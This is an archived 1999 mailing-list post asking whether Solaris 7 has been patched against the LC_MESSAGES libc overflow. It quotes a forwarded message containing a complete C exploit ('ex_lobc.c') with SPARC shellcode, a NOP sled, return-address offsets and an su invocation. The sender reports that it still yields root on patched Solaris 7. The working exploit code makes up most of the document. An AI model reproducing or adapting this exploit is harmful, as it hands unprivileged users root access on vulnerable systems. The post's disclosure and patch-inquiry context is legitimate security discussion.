solaris_LCmessages.txt

`Subject: Question on Solaris LC_MESSAGES libc exploit  
To: [email protected]   
  
  
Hello,  
  
  
A previous message stated that the LC_MESSAGES bug in Solaris has  
been fixed in 7. However, I am still able to gain root with the below code  
on Sparc Solaris 7 5/99 Release boxes with MU2 and 7_Recommended patch set  
installed (offset 7152 gets root for me). Has there been a patch released  
for Solaris 7 that addresses this? Thanks for any help.  
  
  
Viraj.  
  
  
---------- Forwarded message ----------  
Date: Sun, 23 May 1999 14:25:26 +0100  
From: acpizer <[email protected]>  
To: [email protected]  
Subject: Re: Solaris libc exploit  
  
  
Hi guys,  
  
  
Below is a slightly modified exploit which will allow the user to specify  
the offset, the author has not provided offsets for 2.7/SPARC so here  
they are, any one of these can be used: 7144, 7152, 7160, 7168...  
  
  
Cheers.  
  
  
  
-- snip --  
/*============================================================  
ex_lobc.c Overflow Exploits( for Sparc Edition)  
The Shadow Penguin Security  
(http://base.oc.to:/skyscraper/byte/551)  
Written by UNYUN ([email protected])  
  
  
  
offsets for 2.7/SPARC: 7144, 7152, 7160, 7168, and more...  
offset for 2.6/SPARC: 5392  
  
  
============================================================  
*/  
#define EV "LC_MESSAGES="  
#define ADJUST 0  
#define STARTADR 400  
#define NOP 0xa61cc013  
#define RETS 600  
  
  
char x[80000];  
  
  
char exploit_code[] =  
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"  
"\x2b\x0b\xda\xdc\xae\x15\x63\x68"  
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"  
"\x94\x10\x20\x10\x94\x22\xa0\x10"  
"\x9c\x03\xa0\x14"  
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"  
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"  
"\x91\xd0\x20\x08"  
;  
  
  
unsigned long get_sp(void)  
{  
__asm__("mov %sp,%i0 \n");  
}  
  
  
int i;  
unsigned int ret_adr;  
  
  
main(int argc, char *argv[])  
{  
int OFFSET;  
  
  
putenv("LANG=");  
memset(x,'x',70000);  
  
  
  
if (argc == 2)  
OFFSET = atoi(argv[1]);  
else  
OFFSET = 5392; // default offset for 2.6  
  
  
for (i = 0; i < ADJUST; i++) x[i]=0x40;  
for (i = ADJUST; i < 1000; i+=4){  
x[i+3]=NOP & 0xff;  
x[i+2]=(NOP >> 8 ) &0xff;  
x[i+1]=(NOP >> 16 ) &0xff;  
x[i+0]=(NOP >> 24 ) &0xff;  
}  
for (i=0;i<strlen(exploit_code);i++) \  
x[STARTADR+i+ADJUST]=exploit_code[i];  
ret_adr=get_sp()-OFFSET;  
printf("jumping address : %lx, offset = %d\n",ret_adr, OFFSET);  
if ((ret_adr & 0xff) ==0 ){  
ret_adr -=16;  
printf("New jumping address : %lx\n",ret_adr);  
}  
for (i = ADJUST+RETS; i < RETS+600; i+=4){  
x[i+3]=ret_adr & 0xff;  
x[i+2]=(ret_adr >> 8 ) &0xff;  
x[i+1]=(ret_adr >> 16 ) &0xff;  
x[i+0]=(ret_adr >> 24 ) &0xff;  
}  
memcpy(x,EV,strlen(EV));  
x[3000]=0;  
putenv(x);  
execl("/bin/rsh","su",(char *)0);  
}  
-- snip --  
  
  
-------------------------------------------------------------------------------  
"Probably you've only really grown up, when you can bear not being understood."  
  
  
Marian Gold /Alphaville  
`